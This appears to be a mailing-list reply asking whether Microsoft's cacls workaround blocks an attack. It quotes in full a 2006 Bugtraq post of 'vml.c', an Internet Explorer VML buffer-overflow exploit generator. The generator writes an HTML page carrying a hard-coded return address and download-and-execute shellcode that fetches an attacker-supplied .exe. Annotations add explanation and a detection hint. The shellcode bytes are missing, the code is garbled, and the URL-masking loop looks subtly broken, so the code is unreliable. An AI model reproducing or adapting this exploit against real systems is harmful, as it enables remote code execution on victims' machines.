RE: vml.c - Internet Explorer VML Buffer Overflow Download Exec Exploit

Does the Microsoft-suggested workaround — using cacls to revoke the
"Everyone" group's access to the DLL — thwart this particular exploit?

-----Original Message-----
From: nop [mailto:nop@xxxxxxxx] 
Sent: Wednesday, September 20, 2006 2:03 PM
To: bugtraq@xxxxxxxxxxxxxxxxx
* vml.c - Internet Explorer VML Buffer Overflow Download Exec Exploit
* !!! 0day !!! Public Version !!!
* Copyright (C) 2006 XSec All Rights Reserved.
* Author : nop
* : nop#xsec.org
* : http://www.xsec.org
* :
* Tested : Windows 2000 Server CN
* : + Internet Explorer 6.0 SP1
* :
* Compile : cl vml.c
* :
* Usage : d:\>vml
* :
* : Usage: vml <URL> [htmlfile]
* :
* : d:\>vml http://xsec.org/xxx.exe xxx.htm
* :

#include <stdio.h>
#include <stdlib.h>
#include <windows.h>

FILE *fp = NULL;            // output HTML stream: opened in main(), written by convert2ncr(); no fclose() appears in this copy
char *file = "xsec.htm";    // default output filename; main() replaces it with argv[2] when given
char *url = NULL;           // argv[1], checked in main() against MAXURL and the "http://"/"ftp://" substrings

#define NOPSIZE 260         // count of literal 'A' characters main() writes before the encoded buffer
#define MAXURL 60           // maximum accepted URL length (main() also uses the literal 60 as a strncpy bound)

// Hard-coded address copied into the first four bytes of the staging buffer
// in main(); the author's own comments tie each value to a specific OS build.
//DWORD ret = 0x7Ffa4512; // call esp for CN
DWORD ret = 0x7800CCDD; // call esp for All win2k

// NOTE(review): the byte-string initializers for dc, dcstart, sc and dcend
// (and the `footer` string further down) are absent from this archived copy.
// As pasted, these declarations are incomplete and the file does not compile;
// only the author's one-line labels for each block survive.

// Search Shellcode
unsigned char dc[] =

// Shellcode Start
unsigned char dcstart[] =

// Download Exec Shellcode XOR with 0xee
unsigned char sc[] =

// Shellcode End
unsigned char dcend[] =

// HTML Header
// main() prints this verbatim, then NOPSIZE 'A' characters, then the
// NCR-encoded buffer, so everything after `method="` is the payload.
// NOTE(review): this copy appears to have lost lines here as well (e.g. the
// <style> element that would normally enclose the v\:* rule) — treat the
// string as a fragment, not as the exact original markup.
char * header =
"<html xmlns:v=\"urn:schemas-microsoft-com:vml\">\n"
"v\\:* { behavior: url(#default#VML); }\n"
"<v:rect style=\"width:20pt;height:20pt\" fillcolor=\"red\">\n"
"<v:fill method=\"";

// Closing markup written after the encoded buffer; initializer missing in this copy.
char * footer =

// convert string to NCR
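// convert string to NCR
//
// Emits buf[0..size) to the global output stream `fp` as decimal numeric
// character references ("&#NNNN;"), two bytes per reference, low byte
// first (buf[i] is the low byte, buf[i+1] the high byte).
//
// buf:  bytes to encode; read only
// size: number of valid bytes in buf; size <= 0 writes nothing
//
// Differences from the original loop: a trailing odd byte is emitted with a
// zero high byte instead of reading buf[size], which is one past the
// caller-declared length; the format uses %u to match ncr's unsigned type
// (the printed digits are unchanged for the 16-bit values built here).
// Side effect only: main() must have opened `fp` before calling this.
void convert2ncr(unsigned char * buf, int size)
{
    int i = 0;
    unsigned int ncr = 0;

    for (i = 0; i < size; i += 2) {
        ncr = buf[i];
        if (i + 1 < size) {
            // second byte of the pair is the high byte
            ncr += (unsigned int)buf[i + 1] << 8;
        }
        fprintf(fp, "&#%u;", ncr);
    }
}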

/*
 * main: writes an HTML file (`file`, default "xsec.htm") whose VML
 * <v:fill method="..."> attribute is filled with NOPSIZE literal 'A'
 * characters followed by the contents of `buf`, emitted as numeric
 * character references by convert2ncr().
 *
 * Archive note: this copy has lost the block braces, the early exits
 * that presumably followed the usage and error messages, and the
 * condition line in front of the "[-] Open file error!" message; the
 * `";` sequences are mangled double quotes and two string literals are
 * wrapped across lines. Read it as a record of the disclosure, not as
 * compilable source.
 *
 * Detection note: the generated file is recognizable by a v:fill method
 * attribute holding a long run of 'A' characters followed by a long run
 * of "&#NNNN;" entities in place of a method name.
 *
 * Style: `void main` is non-standard; ISO C requires `int main`.
 */
void main(int argc, char **argv)
unsigned char buf[1024] = {0};     // payload staging buffer; refilled with 0x90 below
unsigned char burl[255] = {0};     // masked copy of the URL
int sc_len = 0;                    // sizeof(sc)-1 once the sc initializer is present
int psize = 0;                     // number of bytes of buf in use
int i = 0;

unsigned int nop = 0x4141;         // referenced only by the commented-out fprintf in the NOP loop below
DWORD jmp = 0xeb06eb06;            // not referenced anywhere in the visible code

// Usage banner; no return/exit survives in this copy, so as pasted
// execution would fall through to argv[1].
if (argc < 2)
printf("Windows VML Download Exec Exploit\n");
printf("Code by nop nop#xsec.org, Welcome to http://www.xsec.org\n";);
//printf("!!! 0Day !!! Please Keep Private!!!\n");
printf("\r\nUsage: %s <URL> [htmlfile]\r\n\n", argv[0]);

// Input check: strstr() tests containment, not a prefix, despite the
// wording of the message; length must be in [10, MAXURL].
url = argv[1];
if( (!strstr(url, "http://";) && !strstr(url, "ftp://";)) || strlen(url) <
10 || strlen(url) > MAXURL)
printf("[-] Invalid url. Must start with 'http://','ftp://' and < %d
bytes.\n", MAXURL);

printf("[+] download url:%s\n", url);

if(argc >=3) file = argv[2];

printf("[+] exploit file:%s\n", file);

// Open the output file; the `if (fp == NULL)`-style condition that
// guarded the next printf is missing from this copy.
fp = fopen(file, "w+b");
//fp = fopen(file, "w");
printf("[-] Open file error!\n");

// print html header
fprintf(fp, "%s", header);

// NOPSIZE literal 'A' characters (the NCR form of 0x4141 is commented out)
for(i=0; i<NOPSIZE; i++)
//fprintf(fp, "&#%d;", nop);
fprintf(fp, "A");


// print shellcode
// Fill the whole staging buffer with 0x90, then lay out, in order:
// ret (4 bytes at offset 0), dc at offset 4+8+0x10, dcstart (4 bytes),
// sc, the masked URL with its terminator, and dcend (4 bytes).
memset(buf, 0x90, sizeof(buf));
//memset(buf, 0x90, NOPSIZE*2);

memcpy(buf, &ret, 4);
psize = 4+8+0x10;

memcpy(buf+psize, dc, sizeof(dc)-1);
psize += sizeof(dc)-1;

memcpy(buf+psize, dcstart, 4);
psize += 4;

sc_len = sizeof(sc)-1;
memcpy(buf+psize, sc, sc_len);
psize += sc_len;

// print URL
// The literal 60 duplicates MAXURL; strncpy() does not guarantee a
// terminator, but burl was zeroed on the preceding line and url was
// already limited to MAXURL bytes.
memset(burl, 0, sizeof(burl));
strncpy(burl, url, 60);

// XOR-mask pass over strlen(url)+1 bytes (int/size_t comparison in the condition)
for(i=0; i<strlen(url)+1; i++)
burl[i] = buf[i] ^ 0xee;

memcpy(buf+psize, burl, strlen(url)+1);
psize += strlen(url)+1;

memcpy(buf+psize, dcend, 4);
psize += 4;

// print NCR
// psize bytes of buf become "&#NNNN;" entities inside the method attribute
convert2ncr(buf, psize);

printf("[+] buff size %d bytes\n", psize);

// print html footer
fprintf(fp, "%s", footer);

// fp is never closed in this copy; the runtime flushes it at exit
printf("[+] exploit write to %s success!\n", file);

